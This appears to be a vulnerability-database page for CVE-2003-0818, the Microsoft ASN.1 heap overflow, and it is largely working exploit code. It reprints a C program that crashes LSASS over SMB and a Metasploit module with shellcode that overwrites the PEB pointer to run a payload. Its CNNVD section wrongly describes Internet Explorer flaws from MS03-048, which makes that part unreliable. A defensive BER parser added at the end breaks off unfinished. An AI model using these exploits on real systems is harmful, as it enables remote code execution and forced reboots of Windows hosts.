CVE-2003-0818
CVSS 7.5
Published: 2004-03-03 00:00:00
Revised: 2016-10-17 22:37:36

[Original] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings.


[CNNVD] Microsoft Internet Explorer Multiple Security Vulnerabilities (MS03-048) (CNNVD-200403-040)

        
        Microsoft Internet Explorer is a popular web browser.
        Microsoft Internet Explorer has multiple security issues that can lead to arbitrary code execution, reading of local system files, and downloading of arbitrary files to the user's system.
        The specific issues are as follows:
        - Three vulnerabilities exist in Internet Explorer's cross-domain security model (which keeps windows from different domains from sharing information). They allow arbitrary script to run in the Local Machine zone. To exploit them, an attacker must build a page containing malicious code and lure the user into visiting it; the attacker could also craft a malicious HTML e-mail message and send it to the user to open. Successful exploitation allows access to information from other web sites, access to files on the user's system, and execution of arbitrary code on the user's system.
        - A security issue exists in the way Internet Explorer passes zone information to an XML object. It allows an attacker to read local files on the user's system. To exploit it, an attacker must build a page containing malicious code and lure the user into visiting it; the attacker could also craft a malicious HTML e-mail message and send it to the user to open. After the user browses the malicious site or views the HTML e-mail message, the user is prompted to download an HTML page; if the user accepts the download, the attacker can read local files in known locations.
        - A security issue exists when Internet Explorer performs a drag-and-drop operation on a dynamic HTML event. If the user clicks, the vulnerability allows a file to be saved to a target directory on the user's system, with no dialog prompting the user to download it. To exploit it, an attacker must build a page containing malicious code and lure the user into visiting it; the attacker could also craft a malicious HTML e-mail message and send it to the user to open. If the user clicks the malicious link, code can be saved to the user's computer.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp5:workstation  (Microsoft Windows 4.0 sp5 workstation)
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6:workstation  (Microsoft Windows 4.0 sp6 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp3:workstation  (Microsoft Windows 4.0 sp3 workstation)
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_nt:4.0:sp4:workstation  (Microsoft Windows 4.0 sp4 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp1:workstation  (Microsoft Windows 4.0 sp1 workstation)
cpe:/o:microsoft:windows_nt:4.0:sp2:workstation  (Microsoft Windows 4.0 sp2 workstation)
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_nt:4.0:sp6a:server  (Microsoft Windows 4.0 sp6a server)
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP5)
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP2)
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP6)
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP4)
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP1)
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstation  (Microsoft Windows 4.0 sp6a workstation)
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_server  (Microsoft Windows NT Terminal Server 4.0 SP3)
cpe:/o:microsoft:windows_xp::gold:professional  (Microsoft Windows XP Professional Gold)
cpe:/o:microsoft:windows_2000::sp3:professional  (Microsoft Windows 2000 Professional SP3)
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_nt:4.0:sp5:server  (Microsoft Windows 4.0 sp5 server)
cpe:/o:microsoft:windows_2000::sp1:professional  (Microsoft Windows 2000 Professional SP1)
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_nt:4.0:sp6:server  (Microsoft Windows 4.0 sp6 server)
cpe:/o:microsoft:windows_2000::sp2:professional  (Microsoft Windows 2000 Professional SP2)
cpe:/o:microsoft:windows_nt:4.0:sp3:server  (Microsoft Windows 4.0 sp3 server)
cpe:/o:microsoft:windows_2000::sp3:advanced_server  (Microsoft Windows 2000 Advanced Server SP3)
cpe:/o:microsoft:windows_nt:4.0:sp4:server  (Microsoft Windows 4.0 sp4 server)
cpe:/o:microsoft:windows_2000::sp2:advanced_server  (Microsoft Windows 2000 Advanced Server SP2)
cpe:/o:microsoft:windows_nt:4.0:sp1:server  (Microsoft Windows 4.0 sp1 server)
cpe:/o:microsoft:windows_2000::sp1:advanced_server  (Microsoft Windows 2000 Advanced Server SP1)
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:server  (Microsoft Windows 4.0 sp2 server)
cpe:/o:microsoft:windows_2000::sp1:server  (Microsoft Windows 2000 Server SP1)
cpe:/o:microsoft:windows_2000::sp3:server  (Microsoft Windows 2000 Server SP3)
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp2:server  (Microsoft Windows 2000 Server SP2)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:799  (Windows Server 2003 ASN.1 Library Integer Overflow Vulnerabilities)
oval:org.mitre.oval:def:797  (Windows XP ASN.1 Library Integer Overflow Vulnerabilities)
oval:org.mitre.oval:def:796  (Windows NT ASN.1 Library Integer Overflow Vulnerabilities)
oval:org.mitre.oval:def:653  (Windows 2000 ASN.1 Library Integer Overflow Vulnerabilities)
*OVAL describes in detail how to detect this vulnerability; the referenced OVAL definitions contain further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0818
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0818
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-040
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107643836125615&w=2
(UNKNOWN)  BUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Length Overflow Heap Corruption
http://marc.info/?l=bugtraq&m=107643892224825&w=2
(UNKNOWN)  BUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Bit String Heap Corruption
http://marc.info/?l=ntbugtraq&m=107650972617367&w=2
(UNKNOWN)  NTBUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Length Overflow Heap Corruption
http://marc.info/?l=ntbugtraq&m=107650972723080&w=2
(UNKNOWN)  NTBUGTRAQ  20040210 EEYE: Microsoft ASN.1 Library Bit String Heap Corruption
http://www.kb.cert.org/vuls/id/216324
(VENDOR_ADVISORY)  CERT-VN  VU#216324
http://www.kb.cert.org/vuls/id/583108
(UNKNOWN)  CERT-VN  VU#583108
http://www.microsoft.com/technet/security/bulletin/MS04-007.asp
(VENDOR_ADVISORY)  MS  MS04-007
http://www.us-cert.gov/cas/techalerts/TA04-041A.html
(UNKNOWN)  CERT  TA04-041A

- Vulnerability details

Microsoft Internet Explorer Multiple Security Vulnerabilities (MS03-048)
High  Boundary condition error
2004-03-03 00:00:00 2006-03-28 00:00:00
Remote
        

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Require a prompt before running ActiveX controls and active scripting in the Internet and Intranet zones.
        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS03-048) and a corresponding patch:
        MS03-048: Cumulative Security Update for Internet Explorer (824145)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS03-048.asp

        Patch downloads:
        Internet Explorer 6 Service Pack 1:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B-46C9-B6C6-12DE03860465&displaylang=en

        Internet Explorer 6 Service Pack 1 (64-Bit Edition):
        http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629-4E0E-BF60-24845D2D20C9&displaylang=en

        Internet Explorer 6 Service Pack 1 for Windows Server 2003:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940-48E0-B163-3FCDCB558F21&displaylang=en

        Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition):
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48-4B65-989D-58B0CE1E6F95&displaylang=en

        Internet Explorer 6:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7-4EA6-9CC2-27D104D4198E&displaylang=en

        Internet Explorer 5.5 Service Pack 2:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=E438AFD4-DF70-448C-8925-1075C8BE6C5E&displaylang=en

        Internet Explorer 5.01 Service Pack 4:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2-43A4-A1A1-676374B66517&displaylang=en

        Internet Explorer 5.01 Service Pack 3:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C-4D8A-9979-3B4F540F90A8&displaylang=en

        Internet Explorer 5.01 Service Pack 2:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893-4DA4-A223-B0DE548D6D83&displaylang=en

- Vulnerability details (153)

MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) (EDBID:153)
windows dos
2004-02-14 Verified
0 Christophe Devine
N/A [Download]
/*
 *  MS04-007 Exploit LSASS.EXE Win2k Pro Remote Denial-of-Service
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

 /*
  *   > MS04-007-dos.exe 10.0.0.1 445
  *   connect failed
  *
  *   > nbtstat -A 10.0.0.1
  *   [..]
  *       SERVER3        <20>  UNIQUE      Registered
  *   [..]
  *   > MS04-007-dos.exe 10.0.0.1 139 SERVER3
  *   > MS04-007-dos.exe 10.0.0.1 139 SERVER3
  *   >
  *
  *   if the exploit works, LSASS gets killed,
  *   and after 1mn the server reboots.
  *  
  */

//#define WIN32

#ifdef WIN32

#include <winsock2.h>
#include <windows.h>

#else

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#endif

#include <stdio.h>
#include <string.h>   /* memcpy, memset, strlen */

/****************************************************************/

unsigned char netbios_sess_req[] =

/* NetBIOS Session Request */

"\x81\x00\x00\x44"

"\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43"
"\x41\x00"

"\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43"
"\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41"
"\x41\x00";

/****************************************************************/

unsigned char negotiate_req[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\x00\xB3"

"\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x02\x00"

/* Negotiate Protocol Request, actually sniffed from smbclient */

"\x00\x90\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50"
"\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4D\x49\x43\x52"
"\x4F\x53\x4F\x46\x54\x20\x4E\x45\x54\x57\x4F\x52\x4B\x53\x20\x31"
"\x2E\x30\x33\x00\x02\x4D\x49\x43\x52\x4F\x53\x4F\x46\x54\x20\x4E"
"\x45\x54\x57\x4F\x52\x4B\x53\x20\x33\x2E\x30\x00\x02\x4C\x41\x4E"
"\x4D\x41\x4E\x31\x2E\x30\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x44\x4F\x53\x20\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31"
"\x00\x02\x53\x61\x6D\x62\x61\x00\x02\x4E\x54\x20\x4C\x41\x4E\x4D"
"\x41\x4E\x20\x31\x2E\x30\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E"
"\x31\x32\x00";

/****************************************************************/

unsigned char setup_request[] =

/* NetBIOS Message Type + Length & SMB Header */

"\x00\x00\xCC\xCC"

"\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x03\x00"

/* Session Setup AndX Request */

"\x0C\xFF\x00\x00\x00\xFF\xFF\x02\x00\x01\x00\x00\x00\x00\x00\xCC"
"\xCC\x00\x00\x00\x00\x5C\x00\x00\x80\xCC\xCC";

/* Security Blob: SPNEGO OID + ASN.1 stuff */

unsigned char security_blob[] =

/* Application Constructed Object + SPNEGO OID */

"\x60\x82\xCC\xCC\x06\x06\x2B\x06\x01\x05\x05\x02"

/* negTokenInit + Constructed Sequence */

"\xA0\x82\xCC\xCC\x30\x82\xCC\xCC"

/* mechType: NTLMSSP OID */

"\xA0\x0E\x30\x0C\x06\x0A\x2B\x06\x01\x04\x01\x82\x37\x02\x02\x0A"

/* reqFlags that should trigger the overflow */

"\xA1\x05\x23\x03\x03\x01\x07"

/* mechToken: NTLMSSP (room for shellcode here) */

"\xA2\x82\xCC\xCC\x04\x82\xCC\xCC"

"\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x15\x02\x08\x60"
"\x09\x00\x09\x00\x20\x00\x00\x00\x07\x00\x07\x00\x29\x00\x00\x00"
"\x57\x4F\x52\x4B\x47\x52\x4F\x55\x50\x44\x45\x46\x41\x55\x4C\x54";

/* Native OS & LAN Manager */

unsigned char other_stuff[] =

"\x00\x55\x00\x6E\x00\x69\x00\x78\x00\x00\x00\x53\x00\x61\x00\x6D"
"\x00\x62\x00\x61\x00\x00\x00";

/****************************************************************/

int main( int argc, char *argv[] )
{
    unsigned char buf[4096];
    struct hostent *server_host;
    struct sockaddr_in server_addr;
    int i, len, server_fd, n1, n2, n3;

#ifdef WIN32

    WSADATA wsa;

    /* initialize windows sockets */

    if( WSAStartup( MAKEWORD(2,0), &wsa ) )
    {
        fprintf( stderr, "WSAStartup failed\n" );
        return( 1 );
    }

#endif

    if( argc != 3 && argc != 4 )
    {
        fprintf( stderr, "usage: %s <target hostname> "
                         "<port> [netbios name]\n",
                 argv[0] );

        return( 1 );
    }

    /* resolve the server hostname and connect */

    server_host = gethostbyname( argv[1] );

    if( server_host == NULL )
    {
        fprintf( stderr, "gethostbyname(%s) failed\n", argv[1] );
        return( 1 );
    }

    memcpy( (void *) &server_addr.sin_addr,
            (void *) server_host->h_addr,
            server_host->h_length );

    sscanf( argv[2], "%d", &i );

    server_addr.sin_family = AF_INET;
    server_addr.sin_port   = htons( (unsigned short) i );

    server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );

    if( server_fd < 0 )
    {
        fprintf( stderr, "could not create socket\n" );
        return( 1 );
    }

    len = sizeof( server_addr );

    if( connect( server_fd, (struct sockaddr *)
                 &server_addr, len ) < 0 )
    {
        fprintf( stderr, "connect failed\n" );
        return( 1 );
    }

    if( argc == 4 )
    {
        /* encode the Called NetBIOS Name */

        len = sizeof( netbios_sess_req ) - 1;
        memcpy( buf, netbios_sess_req, len );
        memset( buf + 5, 'A', 32 );

        for( i = 0; i < (int) strlen( argv[3] ); i++ )
        {
            buf[5 + i * 2] += argv[3][i] >> 4;
            buf[6 + i * 2] += argv[3][i] & 15;
        }

        for( ; i < 16; i++ )
        {
            buf[5 + i * 2] += 0x20 >> 4;
            buf[6 + i * 2] += 0x20 & 15;
        }

        /* 1. NetBIOS Session Request */

        if( send( server_fd, buf, len, 0 ) != len )
        {
            fprintf( stderr, "send(NetBIOS Session Request) failed\n" );
            return( 1 );
        }

        if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
        {
            fprintf( stderr, "recv(NetBIOS Session Response) failed\n" );
            return( 1 );
        }

        if( buf[0] == 0x83 )
        {
            fprintf( stderr, "NetBIOS Session rejected "
                             "(wrong NetBIOS name ?)\n" );
            return( 1 );
        }
    }

    /* 2. Negotiate Protocol Request */

    len = sizeof( negotiate_req ) - 1;

    if( send( server_fd, negotiate_req, len, 0 ) != len )
    {
        fprintf( stderr, "send(Negotiate Protocol Request) failed\n" );
        return( 1 );
    }

    if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 )
    {
        fprintf( stderr, "recv(Negotiate Protocol Response) failed\n" );
        return( 1 );
    }

    /* 3. Session Setup AndX Request */

    memset( buf, 'A', sizeof( buf ) );

    n1 = sizeof( setup_request ) - 1;
    n2 = sizeof( security_blob ) - 1;
    n3 = sizeof( other_stuff   ) - 1;

    memcpy( buf,           setup_request, n1 );
    memcpy( buf + n1,      security_blob, n2 );

    n2 += 2000; /* heap padding for shellcode */

    memcpy( buf + n1 + n2, other_stuff,   n3 );

    len = n1 + n2 + n3;

    buf[ 2] = ( ( len - 4 ) >> 8 ) & 0xFF;      /* NetBIOS msg length   */
    buf[ 3] = ( ( len - 4 )      ) & 0xFF;

    buf[51] = ( n2      ) & 0xFF;               /* Security Blob Length */
    buf[52] = ( n2 >> 8 ) & 0xFF;

    buf[61] = ( ( n2 + n3 )      ) & 0xFF;      /* Byte Count (BCC)     */
    buf[62] = ( ( n2 + n3 ) >> 8 ) & 0xFF;

    buf[n1 +  2] = ( ( n2 -  4 ) >> 8 ) & 0xFF; /* ACO Length           */
    buf[n1 +  3] = ( ( n2 -  4 )      ) & 0xFF;

    buf[n1 + 14] = ( ( n2 - 16 ) >> 8 ) & 0xFF; /* negTokenInit Length  */
    buf[n1 + 15] = ( ( n2 - 16 )      ) & 0xFF;

    buf[n1 + 18] = ( ( n2 - 20 ) >> 8 ) & 0xFF; /* Constr. Seq. Length  */
    buf[n1 + 19] = ( ( n2 - 20 )      ) & 0xFF;

    buf[n1 + 45] = ( ( n2 - 47 ) >> 8 ) & 0xFF; /* mechToken Length     */
    buf[n1 + 46] = ( ( n2 - 47 )      ) & 0xFF;

    buf[n1 + 49] = ( ( n2 - 51 ) >> 8 ) & 0xFF; /* String Length        */
    buf[n1 + 50] = ( ( n2 - 51 )      ) & 0xFF;

    if( send( server_fd, buf, len, 0 ) != len )
    {
        fprintf( stderr, "send(Session Setup AndX Request) failed\n" );
        return( 1 );
    }

    recv( server_fd, buf, sizeof( buf ), 0 );

    shutdown( server_fd, 2 );

    return( 0 );
}



// milw0rm.com [2004-02-14]

- Vulnerability details (16377)

Microsoft ASN.1 Library Bitstring Heap Overflow (EDBID:16377)
windows remote
2010-07-25 Verified
0 metasploit
N/A [Download]
##
# $Id: ms04_007_killbill.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = LowRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
			'Description'    => %q{
					This is an exploit for a previously undisclosed
				vulnerability in the bit string decoding code in the
				Microsoft ASN.1 library. This vulnerability is not related
				to the bit string vulnerability described in eEye advisory
				AD20040210-2. Both vulnerabilities were fixed in the
				MS04-007 patch.

				You are only allowed one attempt with this vulnerability. If
				the payload fails to execute, the LSASS system service will
				crash and the target system will automatically reboot itself
				in 60 seconds. If the payload succeeds, the system will no
				longer be able to process authentication requests, denying
				all attempts to login through SMB or at the console. A
				reboot is required to restore proper functioning of an
				exploited system.

				This exploit has been successfully tested with the win32/*/reverse_tcp
				payloads, however a few problems were encountered when using the
				equivalent bind payloads. Your mileage may vary.

			},
			'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
			'License'        => GPL_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0818'],
					[ 'OSVDB', '3902' ],
					[ 'BID', '9633'],
					[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
					[ 'MSB', 'MS04-007'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
						{
							'Platform' => 'win',
						},
					],
				],
			'DisclosureDate' => 'Feb 10 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('PROTO', [ true,  "Which protocol to use: http or smb", 'smb']),
			], self.class)
	end

	# This exploit is too destructive to use during automated exploitation.
	# Better Windows-based exploits exist at this time (Sep 2006)
	def autofilter
		false
	end

	# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
	# as a Metasploit Framework module with his permission. This module is only
	# licensed under GPLv2, keep this in mind if you embed the Framework into
	# a non-GPL application. -hdm[at]metasploit.com

	def exploit

		# The first stage shellcode fixes the PEB pointer and cleans the heap
		stage0 =
			"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+
			"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+
			"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+
			"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+
			"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+
			"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+
			"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+
			"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+
			"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+
			"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+
			"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+
			"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+
			"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+
			"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+
			"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+
			"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+
			"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+
			"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+
			"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+
			"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+
			"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+
			"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+
			"\x08\x00\xeb\xfe"

		token = spnego_token(stage0, payload.encoded)

		case datastore['PROTO']
			when 'smb'
				exploit_smb(token)
			when 'http'
				exploit_http(token)
			else
				print_status("Invalid application protocol specified, use smb or http")
		end
	end


	def exploit_smb(token)
		connect

		client = Rex::Proto::SMB::Client.new(sock)

		begin
			client.session_request(smb_hostname()) if not datastore['SMBDirect']
			client.negotiate
			client.session_setup_ntlmv2_blob(token)
		rescue => e
			if (e.to_s =~ /error code 0x00050001/)
				print_error("The target system has already been exploited")
			else
				print_error("Error: #{e}")
			end
		end

		handler
		disconnect
	end

	def exploit_http(token)
		connect

		req = "GET / HTTP/1.0\r\n"
		req << "Host: #{ datastore['RHOST']}\r\n"
		req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"

		sock.put(req)
		res = sock.get_once

		if (res and res =~ /0x80090301/)
			print_error("This server does not support the Negotiate protocol or has already been exploited")
		end

		if (res and res =~ /0x80090304/)
			print_error("This server responded with error code 0x80090304 (wth?)")
		end

		handler
		disconnect
	end


	# Returns an ASN.1 encoded string
	def enc_asn1(str)
		Rex::Proto::SMB::Utils::asn1encode(str)
	end

	# Returns an ASN.1 encoded bit string with 0 unused bits
	def enc_bits(str)
		"\x03" + enc_asn1("\x00" + str)
	end

	# Returns a BER encoded constructed bit string
	def enc_constr(*str_arr)
		"\x23" + enc_asn1(str_arr.join(''))
	end

	# Returns a BER encoded SPNEGO token
	def spnego_token(stage0, stage1)

		if !(stage0 and stage1)
			print_status("Invalid parameters passed to spnego_token")
			return
		end

		if (stage0.length > 1032)
			print_status("The stage 0 shellcode is longer than 1032 bytes")
			return
		end

		tag = "\x90\x42\x90\x42\x90\x42\x90\x42"

		if ((tag.length + stage1.length) > 1033)
			print_status("The stage 1 shellcode is too long")
			return
		end


		# The first two overwrites must succeed, so we write to an unused location
		# in the PEB block. We don't care about the values, because after this the
		# doubly linked list of free blocks is corrupted and we get to the second
		# overwrite which is more useful.

		fw = "\xf8\x0f\x01\x00"		# 0x00010ff8
		bk = "\xf8\x0f\x01"

		# The second overwrite writes the address of our shellcode into the
		# FastPebLockRoutine pointer in the PEB

		peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB

		bitstring = enc_constr(
			enc_bits("A" * 1024),
			"\x03\x00",
			enc_constr(
				enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))),
				enc_constr( enc_bits(fw + bk) ),
				enc_constr(
					enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))),
					enc_constr(
						enc_bits("\xeb\x06" + make_nops(6)),
						enc_bits("D" * 1040)
					)
				)
			)
		)

		token = "\x60" + enc_asn1(                 # Application Constructed Object
			"\x06\x06\x2b\x06\x01\x05\x05\x02" +   # SPNEGO OID
			"\xa0" + enc_asn1(					   # NegTokenInit (0xa0)
				"\x30" + enc_asn1(
					"\xa1" + enc_asn1(
						bitstring
					)
				)
			)
		)

		return token
	end

end
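
Both the CVE text at the top of this record and the module above point at the same root cause: the decoder trusted a BER length field, or the shape of a BIT STRING, that came straight from the network, so a very large length or a malformed bit string could push writes past the heap allocation. The enc_bits and enc_constr helpers above show the encoding side (tag 0x03 with an unused-bits octet, tag 0x23 for a constructed bit string). What follows is an added defensive example, written for this page and not taken from the record, from eEye, from Christophe Devine, from Solar Eclipse or from the Metasploit project: a bounds-checked BER BIT STRING walker in C that rejects the conditions a safe decoder must refuse. The function names (ber_read_header, ber_bitstring_bits, check_bitstring), the nesting cap and every sample input are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BER_BITSTRING        0x03  /* primitive BIT STRING                */
#define BER_BITSTRING_CONSTR 0x23  /* constructed BIT STRING (BER only)   */
#define MAX_NEST             8     /* nesting cap for constructed strings */

/* Parse one BER tag + length header from buf[0..len). Returns 1 and fills
 * tag, header size and content length; returns 0 if the header is truncated,
 * uses the indefinite form, carries more length octets than size_t can hold,
 * or claims more content than the buffer has left. */
static int ber_read_header(const uint8_t *buf, size_t len,
                           uint8_t *tag, size_t *hdr, size_t *clen)
{
    size_t n, i, v = 0;

    if (len < 2)
        return 0;
    *tag = buf[0];
    if (buf[1] < 0x80) {                /* short form: one length octet */
        *hdr  = 2;
        *clen = buf[1];
    } else {                            /* long form: n length octets   */
        n = buf[1] & 0x7F;
        if (n == 0 || n > sizeof(size_t) || len < 2 + n)
            return 0;
        for (i = 0; i < n; i++)
            v = (v << 8) | buf[2 + i];
        *hdr  = 2 + n;
        *clen = v;
    }
    /* Decisive check: compare with the space left instead of computing
     * hdr + clen, which a huge clen could wrap past the end of the buffer. */
    return *clen <= len - *hdr;
}

/* Count the data bits of the BIT STRING elements in buf[0..len), descending
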